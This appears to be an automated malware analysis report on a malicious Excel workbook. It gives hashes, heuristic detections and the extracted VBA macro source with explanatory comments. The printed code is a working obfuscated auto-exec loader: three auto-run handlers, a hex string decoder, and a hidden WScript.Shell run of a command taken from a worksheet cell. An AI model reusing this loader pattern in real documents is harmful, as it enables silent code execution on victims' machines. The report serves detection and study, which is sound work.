Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cff90d6dbf2be8d2…

MALICIOUS

Office (OLE)

36.0 KB · Created: 2018-04-13 02:00:39 · Authoring application: Microsoft Excel · First seen: 2018-07-27
MD5: 94714d27bf121ac0bcd056f00ccb7ccf SHA-1: f5ab01f10212f2aeae507d64083f7c341469a5e3 SHA-256: cff90d6dbf2be8d234247e7329b23e6d26c196dc77b570b44d1a5e05b808c3be
402 Risk Score

Heuristics 10

  • ClamAV: Xls.Malware.Valyria-6700358-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-6700358-0
  • Excel 4.0 (XLM) Auto_Open + macro sheet critical OLE_XLM_AUTOOPEN
    Workbook contains an Auto_Open / Auto_Close defined name together with an Excel 4.0 macro sheet — the canonical XLM auto-execution shape used by malware families such as Emotet and QakBot.
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches documents whose macros exist only as p-code, or where source extraction failed, so that no macro source is visible.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 229 bytes
SHA-256: fcf35f1fa50ffd18156c14626785018e91b64741c3871fd95926ff05070e1aa6
Preview script
First 1,000 lines of the extracted script
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  XPNo
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9360 bytes
SHA-256: 645209b75981184b0397f4ff0b783ed1d74d52b9783240afec3593a780aa0292
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 20 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Module header as exported by olevba.  VB_Name = "ThisWorkbook" makes this the
' workbook's document module, so the Workbook_Open handler defined below is an
' event handler that runs on load (once macros are enabled), not a plain Sub.
Option Explicit
' Indirection stub.  The auto-exec handlers below never name this procedure in
' clear text: their Application.Run argument "7B777B7B836B6C6667" decodes via
' T_C to "WSWW_GHBC".  The stub only forwards to the loader body PTS_OIC.
Sub WSWW_GHBC()
    PTS_OIC
End Sub
' String decoder used for every indicator in this module.  The input is read two
' hex digits at a time; each pair is turned into a byte via a Chr/Asc round-trip
' and 36 is subtracted.  Example: "7B" -> &H7B = 123, 123 - 36 = 87 = "W".
' NOTE(review): Asc(Chr(n)) goes through the system ANSI code page; for
' n >= &H80 the round-trip may not be identity on a DBCS locale -- confirm
' before emulating this as a plain (hex value - 36) transform.
Public Function T_C(ByVal text As String)
   Dim JP_LQL As String   ' accumulated plaintext
   Dim RIE_G As Long      ' 1-based index into text, advanced one hex pair per step
   For RIE_G = 1 To Len(text) Step 2
        JP_LQL = JP_LQL & Chr(Asc(Chr("&H" & Mid(text, RIE_G, 2))) - 36)
   Next
   T_C = JP_LQL
End Function
' Auto-exec entry: Auto_Open runs when the workbook is opened with macros
' enabled.  The Application.Run argument decodes (via T_C) to "WSWW_GHBC", so
' the called procedure's name is kept out of the visible macro source.
Public Sub Auto_Open()
    Application.Run T_C("7B777B7B836B6C6667")
End Sub
' Same decoded target ("WSWW_GHBC") as Auto_Open.  Document_Open is Word's
' document event name; in an Excel ThisWorkbook module it is presumably never
' raised as an event and only mirrors Auto_Open -- confirm before relying on it
' as an execution path.
Public Sub Document_Open()
    Application.Run T_C("7B777B7B836B6C6667")
End Sub
' Loader body.  The CreateObject argument "7B7787968D949852778C899090" decodes
' via T_C to "WScript.Shell".  The command that is actually executed is NOT in
' the macro source: it is read from cell J225 of sheet "XPNop" at run time and
' decoded with the same T_C routine, so static inspection of this module alone
' does not reveal the payload -- the sheet contents must be extracted as well.
Public Sub PTS_OIC()
    Dim NZJ_J As Object: Set NZJ_J = VBA.CreateObject(T_C("7B7787968D949852778C899090"))
    ' The following ten strings are assigned but never read anywhere in this
    ' procedure.  They use only the hex-digit alphabet that T_C consumes (i.e.
    ' they are hex-pair encoded, not base64) and are presumably filler/decoy
    ' material; they are likely what the artifact triage reported as
    ' "long base64-like blob(s)".
    Dim JK_RI As String
JK_RI = "636333634580637F49635E636387638663647C6C63784A7163636363A2635799636349636C57639863793447637F63639763A0726D636363636363439563A26363626C3D7784636370672785638A63636379766393638E63977D26632B5963A291639163639E43636363639A6397639A276"
Dim AKE_Y As String
AKE_Y = "35A3F76639A89639163638158633A63636341635062925A63846363352480636378636350636C2C63456349468863636368A363A263986363A34963636380636363873A457B2F63638D41633463632F634584A03263635B6363D651636352637563966363982F63917A5163634D635A6363"
Dim QS_Q As String
QS_Q = "4946D86363636C46EB7D8F638345636395633094638B632E63634B6348572D88634A636350664F63636363636F932C638570633C6366716363636363864986486363636368636363636CA19263586363636F63633F95999F63636363834A63316DA12B375B4D63638E63628242635C63639"
Dim WO_JLR As String
WO_JLR = "59563456363634B8963636363637A63633A6393636363306363573B814C636359633D63586363636363636345635763636338485D63342B94632A6363636363778663636363636263636F6363726362265B637563969F63636343636358636A632863634163636363637072776369466E63"
Dim OSL_EW As String
OSL_EW = "A16363876363632B634063639A6365286363636344768B6394264A5064776363636363639999696363392D63376383633073637E88634F7F63636363786363859A637E635C9C46312E6D636363A044639C63635B7C636363636363427263405B63636363335B7B6363478A3D626363635D4"
Dim EK_U As String
EK_U = "E4285632F63635B636363306363935663638F6363843F9263639C63637A637F636343638C637235637D83A34E632963636E86636363638D6863386363638863A263638F9B637D63636333517F63636352308B63632C746398636363636363923F63493E638763843E63639582329463608D"
Dim Z_HRY As String
Z_HRY = "6363639A6354639C6463636343633663636363635E636563539C5139634F63636363637C27636363907D6A63696363637074634F6363936363636B452763393B38754A636363245E7582636363586381638D6363636063698B826363635563556363386363636363646333634E3785633B6"
Dim A_A As String
A_A = "3638863A36399636363338C488663516C5B2E636363636350633F78632598636368636363444B3A67926363636358816363262963636376637D6863814A635B636A5B6363639D74629D636E776363632F636376666363635B63347E63A1266663637E63639D4D632A9D3928633E81734963"
Dim ZKE_RQY As String
ZKE_RQY = "6393634763666352436363756363635E3C267F63374D9A5B638D45636C638B51633A5F6363636D636F2E3063636D2F63257F635A636363A28758444163637C6398246363636D44366363438D912F9E636361305D63637F654A8F634C63894E634F64637163635E63656363357C636C634F6"
Dim DXT_CQJ As String
DXT_CQJ = "3708963427E9F936396633B86636563686263637B8927636339376363715E638B6396635D636363634EA06363635228758C3F9E328C3F63637E63A32D634B8E729F7B632F915F632D825E63396369636363636391632E63632B51336C638478616378599763635194946351636363396963516379638563712B928A316363936355636E637475633B6363A02B63433A373B63636363644F63638F63A14363647787636348638D6E6363246395637C76636356636C566343848D637C63634B63"

    ' WScript.Shell.Run(command, windowStyle, waitOnReturn): window style 0 runs
    ' the child hidden, True blocks until it exits.  Detection/hunting point:
    ' EXCEL.EXE spawning a child via WScript.Shell with a hidden window.
    NZJ_J.Run T_C(ThisWorkbook.Sheets("XPNop").Range("J225").Value), 0, True
End Sub
' Workbook_Open event handler -- fires on load because this is the ThisWorkbook
' module.  Third auto-exec path to the same target: the decoded name
' ("WSWW_GHBC") is qualified with "ThisWorkbook." before Application.Run.
Sub Workbook_Open()
    Application.Run "ThisWorkbook." & T_C("7B777B7B836B6C6667")
End Sub

' Processing file: /opt/analyzer/scan_staging/2290ff7649bc432b9af5765b1e42ab24.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 8003 bytes
' Line #0:
' 	Option  (Explicit)
' L
... (truncated)